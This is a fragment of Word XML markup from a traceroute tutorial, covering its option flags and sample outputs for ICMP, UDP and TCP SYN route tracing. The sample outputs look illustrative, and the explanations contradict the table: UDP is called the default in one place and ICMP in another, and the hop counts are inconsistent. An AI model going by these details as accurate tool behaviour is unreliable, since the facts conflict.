            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1747D11B"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lastRenderedPageBreak/>
              <w:t>-v</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392DC6F6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Verbose output</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="6C3AD4A8" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4444F844"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x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24F52936" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Toggle checksums</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="5A2C0EC2" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27FD1B48"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="340C6283" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="35E9B4B4" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="673F1A24"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7ADAC5F8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use IPv6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="39C01C22" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61C62FBC"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I</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0B22310B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use ICMP ECHO for probing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="2F9447FC" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A04137A"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T</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="296C01F8" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use TCP SYN for probing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7E8684BE" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="669A4D8F"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U</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="489E5DEF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use UDP datagrams for probing (default)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="16457BE5" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="099F74F2"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P protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45562E92" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use raw packets of specified protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="7FFD45CD" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02AEC667"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F</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05FE1877" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Set Don't Fragment bit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="12CB300B" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="326BBFA0"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N squeries</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AA338E9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Number of simultaneous queries (default 16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="09676EF3" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="17FED0F8"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A</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25A36BB3" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Perform AS path lookups</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00251962" w:rsidRPr="00251962" w14:paraId="216178AC" w14:textId="77777777" w:rsidTr="00251962">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6018073D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962"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M method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14DA9A63" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="00251962">
              <w:t>Use specified method for traceroute</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="335F1482" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Examples and Use Cases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F56C4C" w14:textId="6394BE61" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Basic route tracing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C488D14"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google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06592092" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24432E8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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405C87F9"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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D9254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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D7751F4"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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658FFCF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4  backbone1.isp.net (203.0.113.10)  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE79AC4"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5  backbone2.isp.net (203.0.113.20)  25.234 ms  25.123 ms  25.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53293CA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6  google-peer.isp.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7008984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7  * * *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C6ABD2"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8  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BA4A78" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C79365" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Header info</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: 30 hops max, 60-byte UDP packets sent to google.com (142.251.46.142)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186E4D34" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 1</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Local router (192.168.1.1) with ~1ms latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A94909E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 2</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP local gateway (10.0.0.1) with ~8ms latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107CD73E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 3</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP main gateway with ~15ms latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="205A10D6" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hops 4-6</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: ISP backbone routers with increasing latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4494C5" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 7 (*</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve"> )**: Router not responding to traceroute probes (firewall/security)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740C17CA" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hop 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Final destination reached with ~32ms total latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF99280" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Three probes</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Each hop shows 3 timing measurements for reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139DCD2D" w14:textId="77777777" w:rsidR="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="176"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path visualization</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t xml:space="preserve">: Shows complete network path from source to destination </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1776048E" w14:textId="1C4E4012" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Use UDP instead of ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25997D1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U google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C60124E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAAE9FD"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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DF7CD5"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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC4BCC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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498A6652"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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D843DB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4  backbone1.isp.net (203.0.113.10)  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353F8A57"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5  google-peer.isp.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AAF9A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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77396C63" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71000C8B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol change</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: -U forces UDP probe packets instead of default ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE36FE" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Firewall bypass</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Some networks block ICMP but allow UDP traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C089E9" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fewer hops</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Path completed in 6 hops (one router filtered)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F778F1B" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>UDP advantages</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Better success rate through firewalls and NAT devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B9C205" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Same timing</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Latency measurements remain accurate regardless of protocol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19551109" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="177"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network compatibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: UDP traceroute works when ICMP is disabled by security policies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7B4A3A" w14:textId="08375D50" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:t>Use TCP SYN packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DB899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 -p 80 google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3AE6EF" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABA40A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google.com (142.251.46.142), 30 hops max, 60 byte packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465035B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1  router.local (192.168.1.1)  1.234 ms  1.123 ms  1.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E2A8E65"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2  10.0.0.1 (10.0.0.1)  8.234 ms  8.123 ms  8.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A58067"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3  isp-gateway.net (203.0.113.1)  15.234 ms  15.123 ms  15.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153B9C6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4  backbone1.isp.net (203.0.113.10)  22.234 ms  22.123 ms  22.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEAE81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5  google-peer.isp.net (203.0.113.30)  28.234 ms  28.123 ms  28.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D7873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6  lga25s62-in-f14.1e100.net (142.251.46.142)  32.234 ms  32.123 ms  32.456 ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A106F" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B053D8D" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TCP probes</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: -T uses TCP SYN packets instead of UDP/ICMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13173227" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Port targeting</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: -p 80 targets HTTP port specifically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEBB33E" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Firewall evasion</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: TCP SYN packets often bypass strict firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4850C1" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="178"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00251962">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Protocol realism</w:t>
      </w:r>
      <w:r w:rsidRPr="00251962">
        <w:t>: Simulates actual web traffic for accurate routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4EC013" w14:textId="77777777" w:rsidR="00251962" w:rsidRPr="00251962" w:rsidRDefault="00251962" w:rsidP="00251962">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
